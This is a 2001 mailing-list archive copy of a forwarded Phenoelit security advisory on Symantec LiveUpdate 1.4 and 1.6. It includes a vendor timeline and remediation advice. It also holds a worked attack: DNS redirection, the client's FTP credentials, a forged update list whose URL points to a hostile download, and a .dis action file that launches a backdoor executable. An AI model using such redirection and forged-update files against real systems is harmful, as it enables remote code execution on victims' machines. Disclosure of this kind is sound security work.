---------- Forwarded Message ----------
Subject: [Nolug] Fwd: Symantec LiveUpdate attacks
Date: Sat, 6 Oct 2001 09:44:45 +0000
From: Joey Kelly <looseduk@ductape.net>
To: jarc@qth.net, nolug@nolug.org
Cc: joey@bayoulighting.com
---------- Forwarded Message ----------
Subject: Symantec LiveUpdate attacks
Date: Fri, 05 Oct 2001 15:28:27 +0200
From: FX <fx@phenoelit.de>
To: bugtraq@securityfocus.com
Hi all,
attached is an advisory regarding possible attacks on Symantec's
LiveUpdate 1.4 and 1.6. It is also available via HTTP on
http://www.phenoelit.de/stuff/LiveUpdate.txt.
Regards,
FX
-- FX <fx@phenoelit.de> Phenoelit (http://www.phenoelit.de) ------------------------------------------------------- ------------------------------------------------------- -- Joey Kelly < Minister of the Gospel | Computer Networking Consultant > http://joeykelly.dhs.org "When Government fears the people, it's liberty. When people fear the Government, it's tyranny." -- Benjamin Franklin Ich möchte ein Berliner.
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815>
[ Authors ]
FX <fx@phenoelit.de>
DasIch <dasich@phenoelit.de>
kim0 <kim0@phenoelit.de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Symantec LiveUpdate 1.4
Symantec LiveUpdate 1.6
[ Vendor communication ]
09/22/2001 Symantec contacted via symsecurity@symantec.com
09/24/2001 Symsecurity acknowleges email
09/28/2001 Symsecurity response with detail statements (see
"Vendor response" section)
10/01/2001 Additional statements from Symsecurity
10/03/2001 Coordination with symsecurity regarding release
Communication from symsecurity stoped at this point in
time.
[ Overview ]
LiveUpdate is a tool shipped with most Symantec products to download
updates from the Symantec update servers. It is included as part of
the Norton Antivirus Package and several other products in the Symantec
product line.
Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be
used for rapid deployment of hostile code (backdoors, trojan applications,
viruses, worms - if unknow to the NAV pattern file) and for remote
penetration of systems running LiveUpdate via redirection of the initial
connection to a server controlled by the attacker.
Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus
2001 package) does not allow for this type of attack, but it can be
prevented from downloading virus descriptions and product updates. It
can also be used as part of distributed denial of service attacks by
the same attack as described for version 1.4.
[ Decription ]
When LiveUpdate 1.4 is started (either by hand or as a scheduled
task), it looks for the server update.symantec.com. An attacker
can use one of several attacks to return false information to the
querying host such as:
- The attacker controls the DNS server and creates a master
zone for symantec.com.
- The attacker uses routing-based attacks to impersonate the
DNS server.
- The attacker uses DNS poisoning on the DNS server to return
a false IP address.
- The attacker uses layer 2 connection interception to
impersonate the DNS server.
- The attacker sends false DNS responses to the querying host.
When the host running LiveUpdate tries to connect to
update.symantec.com via FTP, it is actually connecting to the FTP
server of the attackers choice. LiveUpdate will then try to receive the
file livetri.zip located in the FTP server directory /opt/content/onramp.
This archive contains the file LIVEUPDT.TRI which holds a complete
list of all Symantec product updates. After LiveUpdate has received the
file, it will compare the product versions to the versions of the
Symantec products installed on the host and check the appropriate
sequence numbers to see if an update is required. If an update is required,
LiveUpdate will receive the file specified, uncompress it (ZIP format),
and perform the actions described in the .dis file. This includes the
execution of downloaded executables. The reader might see by now how
an attacker can use this behavior in ways other than intended by Symantec.
LiveUpdate 1.6 follows the same procedure described above with one
exception. The actual downloaded update package is different.
First, it's no longer a classic ZIP archive but rather some type of
symantec data compression. Additionally, the file contains
"cryptographic signatures" of all update files. It was not tested
how strong the cryptographic implementation actually is. This
signature makes it virtually impossible to use LiveUpdate 1.6 as
penetration tool. However, by specifying a large file location on
the Internet, a scheduled LiveUpdate session in a medium sized
company will lead to network degradation and outages due to the
large amount of traffic generated.
An item of interesting note is that version 1.6 does not use
cryptographic signatures to verify the initial list LIVEUPDT.TRI
even though it places signatures on all other files. By applying
the attack described above and never changing the content of the file,
one can prevent any updates the victim host might require.
[ Example ]
An example attack was performed for LiveUpdate 1.4 by taking over a
DNS server and creating a master zone for symantec.com. A false
address for the FTP server update.symantec.com was then returned. This FTP
server was configured to with the user 'cust-r2', which is used
by LiveUpdate with the password 'Alpc2p30'. It is not known if all
LiveUpdate installations use the same username and password - but it
is not relevant.
The file /opt/content/onramp/livetri.zip contained a modified
LIVEUPDT.TRI file with the following content:
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates
Type1=Add-Ons
Type2=Documentation
[Mandatory0]
Exclusive=FALSE
ProductName=LiveUpdate
Version=1.4
Language=English
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
Size=624807
ActionItem=noreboot.dis
TypeName=Updates
ItemName=LiveUpate 1.6
ItemDetails=Hacks your computer using LiveUpdate
Platform=x86
AdminCompatible=FALSE
URL=http://www.phenoelit.de/hackme.x86
While LiveUpdate 1.4 has a preference to use the FileName entry and
try to receive the file via FTP, 1.6 has a preference for the URL given.
Since this is a mandatory update for LiveUpdate itself, it will
receive the file first and then try to update itself.
The file ihack.x86 is actually a renamed ihack.zip file with the
following content:
NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE
LUUPDATE.EXE is the trojan/backdoor/whatever file the attacker wants
the system to execute. NOREBOOT.DIS is a INI-like file that contains
the actions LiveUpdate should perform when downloading of the file is
complete. It has the following content:
UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
LUSETUP.exe was part of a real update package we inspected and might
be left out - this was not tested. We just used the same file as
LUUPDATE.exe and it worked.
When the victim host triggered the update mechanism, it downloaded
livetri.zip and then ihack.x86. It then executed the application
LUUPDATE.exe and told the user that the update was successfully
completed. Thank you.
[ Vendor Response ]
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the
current version and every installation should be updated to version
1.6 by now.
Regarding the redirection of the LiveUpdate client, Symantec stated:
"This is, unfortunately, an underlying issue with the Internet
infrastructure that we are well aware of but have limited control over
other than with connection points over which we exercise authority."
As for the denial of service condition, the statement is:
"The denial of service activity, while potentially possible under the
scenerios you indicate below, would affect only a small percentage of
our user base as any spoofing, redirection would be limited to a local
Internet area/region."
[ Solution ]
The improvements Symantec introduced in LiveUpdate 1.6 and higher are
actually "best practice security". It would be advisable to update all
Symantec products using LiveUpdate to version 1.6. This, however does
not prevent an attacker from using LiveUpdate as denial of service
tool or preventing system updates.
Symantec should use the same cryptographic signature method on the
livetri.zip file and advise its customer base off the fact that
LiveUpdate 1.4 is highly insecure.
Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we
are able to determine. The latest LiveUpdate 1.6.x is available from
the URL http://www.symantec.com/techsupp/files/lu/lu.html
According to Symantec, the next version of LiveUpdate will further
enhance security. No statement about the nature of these enhancements
was made.
[ end of file ]
Received on 01/15/02
This archive was generated by hypermail 2.2.0 : 12/19/08 EST